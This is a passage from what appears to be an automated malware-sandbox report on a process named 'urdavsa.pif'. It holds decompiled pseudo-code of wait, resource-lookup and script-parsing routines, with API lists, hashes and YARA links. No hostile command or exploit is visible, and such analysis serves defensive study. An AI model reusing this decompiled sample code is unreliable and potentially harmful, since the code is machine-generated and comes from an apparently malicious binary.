				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E009E6CC9(E009E6CCE(_t6, 0xa200e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xa200e0, 0xa200e0, 2);
				}
				return _t2;
			}






                            0x009f04ba
                            0x009f04c0
                            0x009f04c9
                            0x009f04d2
                            0x00000000
                            0x009f04f1
                            0x009f04f2

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,009F06CE,?), ref: 009F04C0
                            • GetLastError.KERNEL32(?), ref: 009F04CC
                              • Part of subcall function 009E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E6CEC
                            Strings
                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009F04D5
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                            • API String ID: 1091760877-2248577382
                            • Opcode ID: 497cb4f21d7942160e55c617222d08ab0fbd85e7924a480930b740268914c427
                            • Instruction ID: 3e34ae4818ee258a9513e37de1a2bfaf152b7626709bde264881ca56b42df75c
                            • Opcode Fuzzy Hash: 497cb4f21d7942160e55c617222d08ab0fbd85e7924a480930b740268914c427
                            • Instruction Fuzzy Hash: 47D05E3150903177E60163687C0AFEE7A29DBA63B0F60C718F776652F6CA204CA2C3D6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009ED6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009ED6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                            0x009ed6c4
                            0x009ed6d4
                            0x009ed6dc
                            0x009ed6de
                            0x00000000
                            0x009ed6de
                            0x009ed6e3

                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,009ECFBE,?), ref: 009ED6C6
                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,009ECFBE,?), ref: 009ED6D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FindHandleModuleResource
                            • String ID: RTL
                            • API String ID: 3537982541-834975271
                            • Opcode ID: a5ce51f839c0a7be9ca26c643c0116cbb6d938b71b3efa4ca80409219b089bab
                            • Instruction ID: a32ed950aa87606867578683c71a79573ed195a9ea67b632ff83184e6cb59bbe
                            • Opcode Fuzzy Hash: a5ce51f839c0a7be9ca26c643c0116cbb6d938b71b3efa4ca80409219b089bab
                            • Instruction Fuzzy Hash: 78C01231A8236166EB3097B16D0DBC32A48BB08B12F1A0948B685DA5D0DAA5CC92C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: urdavsa.pif PID: 3588 Parent PID: 5956 urdavsa.pifCOMMON

                            Executed Functions

                            Function 00A998F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 55%
                            			E00A998F0(signed int* __eax, void* __eflags, void* __fp0, void* _a4, intOrPtr _a8, void* _a12, char* _a16) {
				intOrPtr _v8;
				short _v10;
				short _v12;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v36;
				char _v40;
				char _v52;
				void* _v56;
				signed int _v60;
				intOrPtr _v64;
				void _v68;
				char _v76;
				void* _v80;
				char _v84;
				void* _v88;
				void _v92;
				char _v100;
				void _v104;
				signed int _v108;
				void* _v112;
				void* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				void _v136;
				void _v140;
				signed int _v144;
				void* _v148;
				signed int _v152;
				void* _v156;
				signed int _v160;
				char _v161;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				WCHAR* _v180;
				signed int _v184;
				void _v188;
				void _v192;
				void* _v196;
				void* _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v224;
				intOrPtr _v228;
				void** __ebx;
				void* __edi;
				void* __esi;
				long _t937;
				void* _t938;
				signed int _t939;
				signed int* _t943;
				signed int _t946;
				signed int _t949;
				void* _t956;
				void* _t958;
				void* _t967;
				signed int _t968;
				signed int _t969;
				signed int _t974;
				signed int _t978;
				void* _t979;
				void* _t983;
				intOrPtr _t984;
				intOrPtr _t985;
				intOrPtr _t997;
				intOrPtr _t1000;
				void* _t1002;
				intOrPtr _t1003;
				void* _t1009;
				intOrPtr _t1011;
				void* _t1012;
				intOrPtr _t1013;
				void* _t1015;
				intOrPtr _t1016;
				void* _t1109;
				intOrPtr _t1111;
				void* _t1112;
				signed int _t1113;
				signed int _t1114;
				void _t1116;
				void* _t1123;
				void* _t1126;
				signed int _t1128;
				void* _t1129;
				signed int _t1130;
				void* _t1131;
				void* _t1139;
				void* _t1153;
				intOrPtr _t1158;
				void* _t1159;
				void* _t1160;
				signed int _t1162;
				void* _t1163;
				signed int _t1164;
				signed int _t1165;
				void* _t1166;
				void* _t1173;
				void* _t1176;
				signed int _t1177;
				signed int _t1193;
				signed int _t1194;
				short _t1195;
				void* _t1197;
				signed int _t1200;
				void* _t1202;
				signed int _t1204;
				void* _t1207;
				void* _t1215;
				void* _t1219;
				signed int _t1220;
				void* _t1222;
				void** _t1223;
				void* _t1227;
				intOrPtr* _t1228;
				signed int _t1229;
				void* _t1231;
				void* _t1232;
				signed int _t1235;
				signed int _t1236;
				void* _t1237;
				void* _t1239;
				void* _t1240;
				intOrPtr* _t1241;
				signed int _t1242;
				void* _t1243;
				void* _t1245;
				void* _t1246;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int* _t1252;
				void* _t1254;
				void* _t1256;
				void* _t1259;
				short* _t1265;
				void* _t1266;
				void _t1269;
				void* _t1270;
				void* _t1272;
				void* _t1276;
				void* _t1278;
				void* _t1281;
				void* _t1283;
				void* _t1284;
				void* _t1286;
				void* _t1288;
				signed int _t1290;
				signed int _t1291;
				signed int _t1295;
				signed int _t1296;
				void* _t1297;
				void* _t1298;
				intOrPtr* _t1308;
				signed int _t1310;
				signed int _t1311;
				void* _t1317;
				intOrPtr* _t1319;
				void* _t1322;
				void* _t1325;
				intOrPtr _t1330;
				signed int _t1332;
				intOrPtr _t1335;
				signed int _t1337;
				void* _t1341;
				void* _t1347;
				void _t1349;
				void* _t1350;
				signed int _t1351;
				signed int _t1352;
				long _t1354;
				void* _t1358;
				void* _t1359;
				void* _t1361;
				signed int _t1362;
				void _t1364;
				signed int _t1365;
				void* _t1369;
				void* _t1376;
				void* _t1379;
				intOrPtr* _t1382;
				void _t1385;
				intOrPtr _t1391;
				void* _t1393;
				intOrPtr _t1394;
				void* _t1396;
				void* _t1397;
				void* _t1402;
				void* _t1403;
				void** _t1406;
				signed int _t1407;
				void _t1411;
				signed int _t1412;
				long _t1413;
				void* _t1414;
				short _t1442;
				void* _t1443;
				void* _t1444;
				signed int _t1448;
				intOrPtr _t1450;
				intOrPtr _t1454;
				intOrPtr _t1455;
				void* _t1474;
				void* _t1477;
				void* _t1478;
				void* _t1485;
				void* _t1487;
				void** _t1488;
				signed int _t1493;
				signed int _t1507;
				void _t1508;
				void* _t1510;
				void* _t1511;
				void _t1513;
				void _t1519;
				void* _t1534;
				void* _t1537;
				void _t1545;
				signed int _t1549;
				intOrPtr _t1559;
				intOrPtr _t1561;
				intOrPtr _t1562;
				signed int _t1570;
				void* _t1593;
				WCHAR* _t1595;
				void _t1609;
				signed int _t1611;
				intOrPtr _t1617;
				intOrPtr _t1618;
				void* _t1652;
				signed int _t1660;
				signed int _t1664;
				intOrPtr _t1665;
				intOrPtr _t1668;
				void* _t1669;
				void* _t1672;
				void* _t1684;
				void* _t1693;
				intOrPtr _t1697;
				intOrPtr _t1710;
				intOrPtr _t1717;
				intOrPtr _t1725;
				void* _t1730;
				intOrPtr* _t1731;
				intOrPtr* _t1732;
				intOrPtr* _t1733;
				intOrPtr* _t1734;
				signed int _t1735;
				void _t1738;
				void* _t1740;
				void _t1741;
				signed int _t1746;
				signed int* _t1748;
				void* _t1750;
				signed int _t1753;
				signed int _t1754;
				long _t1755;
				signed int _t1761;
				intOrPtr _t1762;
				void* _t1763;
				void* _t1767;
				signed int _t1768;
				intOrPtr* _t1769;
				void* _t1770;
				void* _t1777;
				signed int _t1778;
				signed int _t1782;
				signed int _t1785;
				void* _t1787;
				void* _t1788;
				signed int _t1790;
				signed int _t1791;
				intOrPtr _t1796;
				signed int _t1799;
				signed int _t1803;
				void* _t1806;
				void* _t1809;
				void* _t1826;
				signed int _t1836;
				void* _t1851;

				_t1851 = __fp0;
				_t1391 = _a8;
				_t1728 = __eax;
				_t1757 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4))))));
				_t937 = E00AA10E1( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4)))))));
				_t1806 = (_t1803 & 0xfffffff8) - 0xd4 + 4;
				_v176 = _t937;
				_t938 = _t937 + 1;
				if(_t938 == 0) {
					_t939 = 8;
				} else {
					_t939 = (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3);
					_t1836 = _t939;
				}
				_v172 = _t939;
				_push( ~(0 | _t1836 > 0x00000000) | _t939 * 0x00000002);
				_v180 = E00AA14F7(_t1728, _t1757, _t1836);
				E00AA0D80(_t941, _t1757, _v176 + _v176 + 2);
				_push(4);
				_t943 = E00AA14F7(_t1728, _t1757, _t1836);
				_t1809 = _t1806 + 0x14;
				if(_t943 == 0) {
					_t943 = 0;
				} else {
					 *_t943 = 1;
				}
				_v168 = _t943;
				if( *((intOrPtr*)(_a4 + 0x140)) == 0) {
					L288:
					E00A92480( &_v180);
					goto L289;
				} else {
					if( *_t943 > 1) {
						 *_v168 =  *_v168 - 1;
						E00A915E0( &_v180);
						_t949 = E00AD653C(_v176 + 1);
						_v176 = _t949;
						_push( ~(0 | __eflags > 0x00000000) | _t949 * 0x00000002);
						_t1761 = E00AA14F7(_t1728, _t949, __eflags);
						E00AA0D80(_t1761, _v184, _v180 +  &(_v180[1]));
						_t1809 = _t1809 + 0x10;
						_v184 = _t1761;
					}
					CharUpperBuffW(_v180, _v176);
					_t956 = _a4;
					_t1762 =  *((intOrPtr*)(_t956 + 0x13c));
					if(_t1762 != 0) {
						_t958 =  *((intOrPtr*)(_t956 + 0x140)) - 1;
						__eflags = _t958;
						if(_t958 < 0) {
							goto L288;
						}
						_v136 = 0;
						_v116 = _t958;
						do {
							asm("cdq");
							_v200 = _v116 + _v136 - _v136 >> 1;
							__eflags = E00A9BF10( &_v180,  *((intOrPtr*)(_t1762 + (_v116 + _v136 - _v136 >> 1) * 4)));
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									__eflags = _v136 - _v116;
									if(_v136 > _v116) {
										goto L288;
									}
									_t1763 =  *(_t1762 + _v200 * 4);
									E00A92480( &_v180);
									L17:
									_t967 = _t1763;
									if(_t967 == 0) {
										L289:
										_t946 = E00B0DC75(__eflags, _t1851, _a4, _t1391, _t1728, _a12);
										L264:
										return _t946;
									}
									_v136 =  *((intOrPtr*)(_t967 + 0x14));
									_t968 =  *_t1728;
									_v160 =  *((intOrPtr*)(_t967 + 0x18));
									_v24 =  *((intOrPtr*)(_t967 + 0x10));
									_t1609 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t968 * 4)) + 0xa));
									_t969 = _t968 + 1;
									 *_t1728 = _t969;
									_v8 =  *((intOrPtr*)(_a4 + 0x148));
									_v196 = 0;
									_v188 = 1;
									_v184 = 0;
									_v180 = 0xb18068;
									_v176 = 0;
									_v172 = 0;
									_v168 = 0;
									_v132 = 0xb1c440;
									_v128 = 0;
									_v124 = 0;
									_v120 = 0;
									if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t969 * 4)) + 8)) != 0x47) {
										_push(_t1609);
										_push(0x6f);
										_push(_a4);
										L624:
										E00AEE724(_t1851);
										goto L625;
									} else {
										_t974 = _t969 + 1;
										_v104 = _t1609;
										_t1611 = _t974;
										_v204 = 0;
										_t1767 = 0;
										_v144 = _t1611;
										while(1) {
											 *_t1728 = _t974;
											_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
											if(_t1442 < 0x47) {
											}
											L21:
											_t974 = _t974 + 1;
											while(1) {
												 *_t1728 = _t974;
												_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
												if(_t1442 < 0x47) {
												}
												goto L22;
											}
											goto L21;
											L22:
											_t1443 = _t1442 - 0x47;
											__eflags = _t1443;
											if(_t1443 == 0) {
												_t1767 = _t1767 + 1;
												goto L21;
											}
											_t1444 = _t1443 - 1;
											__eflags = _t1444;
											if(_t1444 != 0) {
												__eflags = _t1444 != 0x37;
												if(_t1444 != 0x37) {
													goto L21;
												}
												_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4 - 4)) + 0xa)));
												_push(0x6f);
												_push(_a4);
												goto L624;
											}
											__eflags = _t1767;
											if(_t1767 != 0) {
												_t1767 = _t1767 - 1;
												_t974 = _t974 + 1;
												continue;
											}
											_v208 = _t974;
											 *_t1728 = _t974 + 1;
											_t978 = _v24;
											__eflags = _t978 -  *0xb390f8; // 0x0
											if(__eflags > 0) {
												L296:
												_v148 = _t1444;
												L28:
												_v116 = _t1444;
												__eflags = _v136 - _t1444;
												if(_v136 <= _t1444) {
													L57:
													_t979 = _v116;
													__eflags = _t979 - _v160;
													if(_t979 < _v160) {
														L622:
														_push(_v104);
														_push(0x70);
														goto L623;
													}
													__eflags = _t979 - _v136;
													if(_t979 > _v136) {
														goto L622;
													}
													__eflags = _t1611 - _v208;
													if(_t1611 != _v208) {
														goto L622;
													}
													_t1393 = _v24;
													_t1768 = 0;
													_v212 = 3;
													_v200 = 0;
													_v156 = 0;
													_v152 = _t1393;
													__eflags = _t1393;
													if(_t1393 < 0) {
														_v152 = 0;
													}
													__eflags =  *0xb37f3d; // 0x0
													if(__eflags != 0) {
														_t1611 =  *0xb37f38; // 0x0
														 *_t1611 = 0;
														_t1448 =  *0xb37f38; // 0x0
														 *((intOrPtr*)(_t1448 + 4)) = _v152;
														 *0xb37f3d = 0;
													} else {
														_push(0xc);
														_t1295 = E00AA14F7(_t1728, _t1768, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1295 - _t1768;
														if(_t1295 == _t1768) {
															_t1754 = 0;
														} else {
															_t1754 = _t1295;
															 *_t1754 = _t1768;
															_t1611 = _v152;
															 *(_t1754 + 4) = _t1611;
															__eflags = _v152 - _t1768;
															if(_v152 < _t1768) {
																 *(_t1754 + 4) = _t1768;
															}
															_t1296 = _v156;
															__eflags = _t1296 - _t1768;
															if(__eflags != 0) {
																_push(0x20);
																_v204 = _t1296;
																_t1297 = E00AA14F7(_t1754, _t1768, __eflags);
																_t1809 = _t1809 + 4;
																__eflags = _t1297 - _t1768;
																if(_t1297 == _t1768) {
																	_t1298 = 0;
																	__eflags = 0;
																} else {
																	_t1298 = E00ADB393(_t1297);
																}
																 *_t1754 = _t1298;
																E00A9DE00(_t1298, _v204);
																_t1790 = _v208;
																 *((intOrPtr*)( *_t1754 + 0x10)) =  *((intOrPtr*)(_t1790 + 0x10));
																 *((intOrPtr*)( *_t1754 + 0x14)) =  *((intOrPtr*)(_t1790 + 0x14));
																 *((intOrPtr*)( *_t1754 + 0x18)) = 0;
																 *((intOrPtr*)( *_t1754 + 0x1c)) = 0;
																E00AE33B8(_t1754,  *_t1754 + 0x18,  *((intOrPtr*)(_t1790 + 0x18)));
																_t1611 =  *(_t1790 + 0x1c);
																E00AE33B8(_t1754,  *_t1754 + 0x1c, _t1611);
																_t1768 = 0;
															} else {
																 *_t1754 = _t1768;
															}
														}
														_t1549 =  *0xb37f38; // 0x0
														 *(_t1754 + 8) = _t1549;
														 *0xb37f38 = _t1754;
													}
													_t983 = _v156;
													 *0xb37f34 =  *0xb37f34 + 1;
													__eflags = _t983 - _t1768;
													if(_t983 != _t1768) {
														_t1730 = _t983;
														_t984 =  *((intOrPtr*)(_t983 + 0x18));
														__eflags = _t984 - _t1768;
														if(_t984 != _t1768) {
															E00A9B650(_t1393,  &_v156, _t1730, _t984);
														}
														_t985 =  *((intOrPtr*)(_t1730 + 0x1c));
														__eflags = _t985 - _t1768;
														if(_t985 != _t1768) {
															E00A9B650(_t1393,  &_v156, _t1730, _t985);
														}
														__eflags =  *((char*)(_t1730 + 0x10));
														if( *((char*)(_t1730 + 0x10)) == 0) {
															_t1546 =  *((intOrPtr*)(_t1730 + 0x14));
															__eflags =  *((intOrPtr*)(_t1730 + 0x14)) - _t1768;
															if( *((intOrPtr*)(_t1730 + 0x14)) != _t1768) {
																E00A9E3C0(_t1546, _t1730, 1);
															}
														}
														E00AD651E(_t1730);
													}
													__eflags = _v136 - 1;
													if(_v136 < 1) {
														L146:
														_t1769 = _a4;
														_v100 = 0;
														_v88 = 0;
														_v84 = 0;
														_v80 = 0;
														_v76 = 0;
														_v68 = 0;
														_v56 = 0;
														_v52 = 0;
														 *((intOrPtr*)(_t1769 + 0x148)) = _v116;
														_v92 = 1;
														_v60 = 1;
														_t1450 =  *((intOrPtr*)( *_t1769 + 4));
														__eflags =  *((char*)(_t1450 + _t1769 + 0xd));
														_t1731 = _t1450 + _t1769 + 4;
														if(__eflags != 0) {
															E00B038C9(_t1450,  *(_t1731 + 4),  &_v100);
															 *((char*)(_t1731 + 9)) = 0;
														} else {
															_push(0x40);
															_t1176 = E00AA14F7(_t1731, _t1769, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1176;
															if(_t1176 == 0) {
																_t1176 = 0;
															} else {
																__eflags = 0;
																 *(_t1176 + 8) = 1;
																 *((intOrPtr*)(_t1176 + 0xc)) = 0;
																 *_t1176 = 0;
																 *((char*)(_t1176 + 0x10)) = 0;
																 *((intOrPtr*)(_t1176 + 0x14)) = 0;
																 *((char*)(_t1176 + 0x18)) = 0;
																 *(_t1176 + 0x28) = 1;
																 *((intOrPtr*)(_t1176 + 0x2c)) = 0;
																 *((intOrPtr*)(_t1176 + 0x20)) = 0;
																 *((char*)(_t1176 + 0x30)) = 0;
															}
															 *(_t1176 + 0x38) =  *(_t1731 + 4);
															 *(_t1731 + 4) = _t1176;
														}
														 *_t1731 =  *_t1731 + 1;
														_t1394 =  *((intOrPtr*)(_t1769 + 0x16c));
														_t1732 = _t1769 + 0x16c;
														_t1451 = _t1769;
														_v156 =  *((intOrPtr*)(_t1769 + 0xf4));
														E00A99430(_t1769,  *((intOrPtr*)(_t1769 + 0xf4)), _t1851, _t1393 + 1); // executed
														__eflags = _t1394 -  *_t1732;
														if(_t1394 <  *_t1732) {
															do {
																E00A9C9E0(_t1394, _t1451, _t1732);
																__eflags = _t1394 -  *_t1732;
															} while (_t1394 <  *_t1732);
															goto L151;
														} else {
															L151:
															_t1733 = _t1769;
															 *((intOrPtr*)(_t1733 + 0xf4)) = _v156;
															_t1617 =  *((intOrPtr*)( *_t1733 + 4));
															__eflags =  *((char*)(_t1617 + _t1733 + 0xd));
															_t334 = _t1733 + 4; // 0x4
															_t997 =  *((intOrPtr*)(_t1617 + _t334 + 4));
															if( *((char*)(_t1617 + _t1733 + 0xd)) != 0) {
																_t997 =  *((intOrPtr*)(_t997 + 0x38));
															}
															__eflags =  *((char*)(_t997 + 0x10));
															if( *((char*)(_t997 + 0x10)) == 0) {
																_t1770 = _a12;
																 *_a16 = 0;
																E00A99190(_t1733, _t1770);
																 *(_t1770 + 8) = 1;
																 *_t1770 = 0;
																goto L166;
															} else {
																 *_a16 = 1;
																_t1158 =  *((intOrPtr*)( *_t1733 + 4));
																__eflags =  *((char*)(_t1158 + _t1733 + 0xd));
																_t1159 = _t1158 + _t1733 + 4;
																if( *((char*)(_t1158 + _t1733 + 0xd)) != 0) {
																	_t1777 =  *( *(_t1159 + 4) + 0x38);
																} else {
																	_t1777 =  *(_t1159 + 4);
																}
																_t1403 = _a12;
																__eflags = _t1403 - _t1777;
																if(_t1403 == _t1777) {
																	L166:
																	_t1453 =  *_t1733;
																	_t1618 =  *((intOrPtr*)( *_t1733 + 4));
																	__eflags =  *((char*)(_t1618 + _t1733 + 0xd));
																	_t1000 =  *((intOrPtr*)(_t1618 + _t1733 + 8));
																	_t1771 = _t1618 + _t1733 + 4;
																	if( *((char*)(_t1618 + _t1733 + 0xd)) != 0) {
																		_t1000 =  *((intOrPtr*)(_t1000 + 0x38));
																	}
																	__eflags =  *((char*)(_t1000 + 0x18));
																	if( *((char*)(_t1000 + 0x18)) != 0) {
																		_t1002 = E00A93EF0(_t1771);
																		_t1453 =  *((intOrPtr*)(_t1002 + 0x14));
																		_v80 =  *((intOrPtr*)(_t1002 + 0x14));
																	}
																	__eflags =  *((char*)(_t1771 + 9));
																	if( *((char*)(_t1771 + 9)) != 0) {
																		_t1003 =  *((intOrPtr*)( *((intOrPtr*)(_t1771 + 4)) + 0x38));
																	} else {
																		_t1003 =  *((intOrPtr*)(_t1771 + 4));
																	}
																	__eflags =  *((char*)(_t1003 + 0x30));
																	if( *((char*)(_t1003 + 0x30)) != 0) {
																		E00A990D0( &_v68, _t1453, E00A93EF0(_t1771) + 0x20);
																	}
																	_t1396 = _a4;
																	_t1454 =  *((intOrPtr*)( *_t1396 + 4));
																	__eflags =  *((char*)(_t1454 + _t1396 + 0xd));
																	_t1734 = _t1454 + _t1396 + 4;
																	if( *((char*)(_t1454 + _t1396 + 0xd)) != 0) {
																		_t1009 =  *(_t1734 + 4);
																		_t1771 =  *(_t1009 + 0x38);
																		__eflags = _t1009;
																		if(_t1009 != 0) {
																			E00ADCC67(_t1009);
																		}
																		 *(_t1734 + 4) = _t1771;
																		 *((char*)(_t1734 + 9)) = 0;
																	}
																	__eflags =  *((char*)(_t1734 + 8));
																	if( *((char*)(_t1734 + 8)) != 0) {
																		 *((char*)(_t1734 + 9)) = 1;
																		goto L190;
																	} else {
																		_t1771 =  *(_t1734 + 4);
																		_v156 =  *((intOrPtr*)(_t1771 + 0x38));
																		__eflags = _t1771;
																		if(_t1771 == 0) {
																			L189:
																			 *(_t1734 + 4) = _v156;
																			 *((char*)(_t1734 + 9)) = 0;
																			L190:
																			 *_t1734 =  *_t1734 - 1;
																			_t1011 =  *((intOrPtr*)( *_t1396 + 4));
																			_t1455 =  *((intOrPtr*)(_t1011 + _t1396 + 8));
																			_t1012 = _t1011 + _t1396;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
																				_t1455 =  *((intOrPtr*)(_t1455 + 0x38));
																			}
																			 *((intOrPtr*)(_t1455 + 0x14)) = _v80;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			_t1013 =  *((intOrPtr*)(_t1012 + 8));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
																				_t1013 =  *((intOrPtr*)(_t1013 + 0x38));
																			}
																			 *((char*)(_t1013 + 0x18)) = 0;
																			_t1015 =  *((intOrPtr*)( *_t1396 + 4)) + _t1396;
																			__eflags =  *((char*)(_t1015 + 0xd));
																			_v156 = _t1015;
																			if( *((char*)(_t1015 + 0xd)) != 0) {
																				_t1016 =  *((intOrPtr*)( *((intOrPtr*)(_t1015 + 8)) + 0x38));
																			} else {
																				_t1016 =  *((intOrPtr*)(_t1015 + 8));
																			}
																			_t406 = _t1016 + 0x20; // 0x21
																			_t1397 = _t406;
																			__eflags = _t1397 -  &_v68;
																			if(_t1397 ==  &_v68) {
																				L204:
																				_t1735 = _v124;
																				goto L205;
																			} else {
																				_t1109 =  *(_t1397 + 0xc);
																				__eflags = _t1109;
																				if(_t1109 != 0) {
																					E00AD651E(_t1109);
																					 *(_t1397 + 0xc) = 0;
																				}
																				_t1111 =  *((intOrPtr*)(_t1397 + 8));
																				__eflags = _t1111 - 8;
																				if(_t1111 == 8) {
																					_t1474 =  *_t1397;
																					__eflags = _t1474;
																					if(_t1474 == 0) {
																						goto L197;
																					}
																					__imp__#9(_t1474);
																					_push( *_t1397);
																					E00AA10FC();
																					_t1809 = _t1809 + 4;
																					goto L201;
																				} else {
																					L197:
																					__eflags = _t1111 - 0xa;
																					if(_t1111 == 0xa) {
																						_t1112 =  *_t1397;
																						__eflags = _t1112;
																						if(_t1112 != 0) {
																							E00AD30B0(_t1112);
																						}
																					} else {
																						__eflags = _t1111 - 5;
																						if(_t1111 == 5) {
																							E00A9E470(_t1397, _t1771);
																						} else {
																							__eflags = _t1111 - 0xb;
																							if(_t1111 == 0xb) {
																								_push( *((intOrPtr*)( *_t1397 + 4)));
																								E00AA10FC();
																								_push( *_t1397);
																								E00AA10FC();
																								_t1809 = _t1809 + 8;
																							} else {
																								__eflags = _t1111 - 0xc;
																								if(_t1111 == 0xc) {
																									_t1123 =  *_t1397;
																									__eflags = _t1123;
																									if(_t1123 != 0) {
																										E00ADB350(_t1123);
																									}
																								}
																							}
																						}
																					}
																					L201:
																					_t1113 = _v60;
																					 *_t1397 = 0;
																					 *((intOrPtr*)(_t1397 + 8)) = _t1113;
																					__eflags = _t1113 - 1;
																					if(_t1113 != 1) {
																						_t1114 = _t1113 - 1;
																						__eflags = _t1114 - 0xb;
																						if(__eflags > 0) {
																							goto L204;
																						}
																						switch( *((intOrPtr*)(_t1114 * 4 +  &M00ABAE92))) {
																							case 0:
																								goto L202;
																							case 1:
																								 *_t1397 = _v68;
																								 *((intOrPtr*)(_t1397 + 4)) = _v64;
																								goto L204;
																							case 2:
																								__fp0 = _v68;
																								 *__ebx = _v68;
																								goto L204;
																							case 3:
																								_push(0x10);
																								__eax = E00AA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__ebx[3] = 0;
																								} else {
																									__ecx = _v56;
																									__edx =  *__ecx;
																									 *__eax =  *__ecx;
																									__edx =  *(__ecx + 4);
																									 *(__eax + 4) =  *(__ecx + 4);
																									__edx =  *(__ecx + 8);
																									 *(__eax + 8) =  *(__ecx + 8);
																									__ecx =  *(__ecx + 0xc);
																									 *(__eax + 0xc) = __ecx;
																									 *__ecx =  *__ecx + 1;
																									__ebx[3] = __eax;
																								}
																								goto L204;
																							case 4:
																								_push(0x214);
																								__eax = E00AA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									__eax = 0;
																									__eflags = 0;
																								} else {
																									__esi = _v68;
																									__ecx = 0x85;
																									__edi = __eax;
																									__eax = memcpy(__eax, __esi, 0x85 << 2);
																									__esi + __ecx = __esi + __ecx + __ecx;
																									__ecx = 0;
																								}
																								__edi = _v124;
																								 *__ebx = __eax;
																								__eflags =  *(__eax + 4);
																								if( *(__eax + 4) != 0) {
																									__eax =  *(__eax + 4);
																									 *__eax =  *__eax + 1;
																								}
																								L205:
																								_t1018 = _v156;
																								__eflags =  *((char*)(_t1018 + 0xd));
																								if( *((char*)(_t1018 + 0xd)) != 0) {
																									_t1019 =  *((intOrPtr*)( *((intOrPtr*)(_t1018 + 8)) + 0x38));
																								} else {
																									_t1019 =  *((intOrPtr*)(_t1018 + 8));
																								}
																								 *((char*)(_t1019 + 0x30)) = 0;
																								__eflags =  *0xb37f3d;
																								if( *0xb37f3d != 0) {
																									_t1020 =  *0xb37f38; // 0x0
																									_t1771 =  *(_t1020 + 8);
																									E00AFFE4A(_t1397, _t1735, _t1020);
																									_t1458 =  *(_t1020 + 8);
																									 *0xb37f38 = _t1458;
																									 *0xb37f3d = 0;
																								} else {
																									_t1458 =  *0xb37f38; // 0x0
																								}
																								__eflags =  *0xb37f3c;
																								if( *0xb37f3c != 0) {
																									_t1398 = _v128;
																									 *0xb37f3d = 1;
																									goto L229;
																								} else {
																									_t1771 =  *_t1458;
																									_v160 = _t1458[2];
																									_v156 = _t1458;
																									__eflags = _t1771;
																									if(_t1771 == 0) {
